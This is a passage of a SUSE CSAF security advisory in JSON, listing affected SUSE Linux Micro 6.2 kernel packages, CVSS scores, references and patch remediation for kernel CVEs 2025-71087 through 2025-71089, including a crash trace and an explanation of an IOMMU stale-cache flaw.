"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71087",
"url": "https://www.suse.com/security/cve/CVE-2025-71087"
},
{
"category": "external",
"summary": "SUSE Bug 1256628 for CVE-2025-71087",
"url": "https://bugzilla.suse.com/1256628"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71087"
},
{
"cve": "CVE-2025-71088",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71088"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fallback earlier on simult connection\n\nSyzkaller reports a simult-connect race leading to inconsistent fallback\nstatus:\n\n WARNING: CPU: 3 PID: 33 at net/mptcp/subflow.c:1515 subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515\n Modules linked in:\n CPU: 3 UID: 0 PID: 33 Comm: ksoftirqd/3 Not tainted syzkaller #0 PREEMPT(full)\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\n RIP: 0010:subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515\n Code: 89 ee e8 78 61 3c f6 40 84 ed 75 21 e8 8e 66 3c f6 44 89 fe bf 07 00 00 00 e8 c1 61 3c f6 41 83 ff 07 74 09 e8 76 66 3c f6 90 \u003c0f\u003e 0b 90 e8 6d 66 3c f6 48 89 df e8 e5 ad ff ff 31 ff 89 c5 89 c6\n RSP: 0018:ffffc900006cf338 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: ffff888031acd100 RCX: ffffffff8b7f2abf\n RDX: ffff88801e6ea440 RSI: ffffffff8b7f2aca RDI: 0000000000000005\n RBP: 0000000000000000 R08: 0000000000000005 R09: 0000000000000007\n R10: 0000000000000004 R11: 0000000000002c10 R12: ffff88802ba69900\n R13: 1ffff920000d9e67 R14: ffff888046f81800 R15: 0000000000000004\n FS: 0000000000000000(0000) GS:ffff8880d69bc000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000560fc0ca1670 CR3: 0000000032c3a000 CR4: 0000000000352ef0\n Call Trace:\n \u003cTASK\u003e\n tcp_data_queue+0x13b0/0x4f90 net/ipv4/tcp_input.c:5197\n tcp_rcv_state_process+0xfdf/0x4ec0 net/ipv4/tcp_input.c:6922\n tcp_v6_do_rcv+0x492/0x1740 net/ipv6/tcp_ipv6.c:1672\n tcp_v6_rcv+0x2976/0x41e0 net/ipv6/tcp_ipv6.c:1918\n ip6_protocol_deliver_rcu+0x188/0x1520 net/ipv6/ip6_input.c:438\n ip6_input_finish+0x1e4/0x4b0 net/ipv6/ip6_input.c:489\n NF_HOOK include/linux/netfilter.h:318 [inline]\n NF_HOOK include/linux/netfilter.h:312 [inline]\n ip6_input+0x105/0x2f0 net/ipv6/ip6_input.c:500\n dst_input include/net/dst.h:471 [inline]\n ip6_rcv_finish net/ipv6/ip6_input.c:79 [inline]\n NF_HOOK include/linux/netfilter.h:318 [inline]\n NF_HOOK include/linux/netfilter.h:312 [inline]\n ipv6_rcv+0x264/0x650 net/ipv6/ip6_input.c:311\n __netif_receive_skb_one_core+0x12d/0x1e0 net/core/dev.c:5979\n __netif_receive_skb+0x1d/0x160 net/core/dev.c:6092\n process_backlog+0x442/0x15e0 net/core/dev.c:6444\n __napi_poll.constprop.0+0xba/0x550 net/core/dev.c:7494\n napi_poll net/core/dev.c:7557 [inline]\n net_rx_action+0xa9f/0xfe0 net/core/dev.c:7684\n handle_softirqs+0x216/0x8e0 kernel/softirq.c:579\n run_ksoftirqd kernel/softirq.c:968 [inline]\n run_ksoftirqd+0x3a/0x60 kernel/softirq.c:960\n smpboot_thread_fn+0x3f7/0xae0 kernel/smpboot.c:160\n kthread+0x3c2/0x780 kernel/kthread.c:463\n ret_from_fork+0x5d7/0x6f0 arch/x86/kernel/process.c:148\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nThe TCP subflow can process the simult-connect syn-ack packet after\ntransitioning to TCP_FIN1 state, bypassing the MPTCP fallback check,\nas the sk_state_change() callback is not invoked for * -\u003e FIN_WAIT1\ntransitions.\n\nThat will move the msk socket to an inconsistent status and the next\nincoming data will hit the reported splat.\n\nClose the race moving the simult-fallback check at the earliest possible\nstage - that is at syn-ack generation time.\n\nAbout the fixes tags: [2] was supposed to also fix this issue introduced\nby [3]. [1] is required as a dependence: it was not explicitly marked as\na fix, but it is one and it has already been backported before [3]. In\nother words, this commit should be backported up to [3], including [2]\nand [1] if that\u0027s not already there.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71088",
"url": "https://www.suse.com/security/cve/CVE-2025-71088"
},
{
"category": "external",
"summary": "SUSE Bug 1256630 for CVE-2025-71088",
"url": "https://bugzilla.suse.com/1256630"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71088"
},
{
"cve": "CVE-2025-71089",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71089"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu: disable SVA when CONFIG_X86 is set\n\nPatch series \"Fix stale IOTLB entries for kernel address space\", v7.\n\nThis proposes a fix for a security vulnerability related to IOMMU Shared\nVirtual Addressing (SVA). In an SVA context, an IOMMU can cache kernel\npage table entries. When a kernel page table page is freed and\nreallocated for another purpose, the IOMMU might still hold stale,\nincorrect entries. This can be exploited to cause a use-after-free or\nwrite-after-free condition, potentially leading to privilege escalation or\ndata corruption.\n\nThis solution introduces a deferred freeing mechanism for kernel page\ntable pages, which provides a safe window to notify the IOMMU to\ninvalidate its caches before the page is reused.\n\n\nThis patch (of 8):\n\nIn the IOMMU Shared Virtual Addressing (SVA) context, the IOMMU hardware\nshares and walks the CPU\u0027s page tables. The x86 architecture maps the\nkernel\u0027s virtual address space into the upper portion of every process\u0027s\npage table. Consequently, in an SVA context, the IOMMU hardware can walk\nand cache kernel page table entries.\n\nThe Linux kernel currently lacks a notification mechanism for kernel page\ntable changes, specifically when page table pages are freed and reused. \nThe IOMMU driver is only notified of changes to user virtual address\nmappings. This can cause the IOMMU\u0027s internal caches to retain stale\nentries for kernel VA.\n\nUse-After-Free (UAF) and Write-After-Free (WAF) conditions arise when\nkernel page table pages are freed and later reallocated. The IOMMU could\nmisinterpret the new data as valid page table entries. The IOMMU might\nthen walk into attacker-controlled memory, leading to arbitrary physical\nmemory DMA access or privilege escalation. This is also a\nWrite-After-Free issue, as the IOMMU will potentially continue to write\nAccessed and Dirty bits to the freed memory while attempting to walk the\nstale page tables.\n\nCurrently, SVA contexts are unprivileged and cannot access kernel\nmappings. However, the IOMMU will still walk kernel-only page tables all\nthe way down to the leaf entries, where it realizes the mapping is for the\nkernel and errors out. This means the IOMMU still caches these\nintermediate page table entries, making the described vulnerability a real\nconcern.\n\nDisable SVA on x86 architecture until the IOMMU can receive notification\nto flush the paging cache before freeing the CPU kernel page table pages.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71089",
"url": "https://www.suse.com/security/cve/CVE-2025-71089"
},
{
"category": "external",
"summary": "SUSE Bug 1256612 for CVE-2025-71089",
"url": "https://bugzilla.suse.com/1256612"
},
{
"category": "external",
"summary": "SUSE Bug 1256615 for CVE-2025-71089",
"url": "https://bugzilla.suse.com/1256615"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
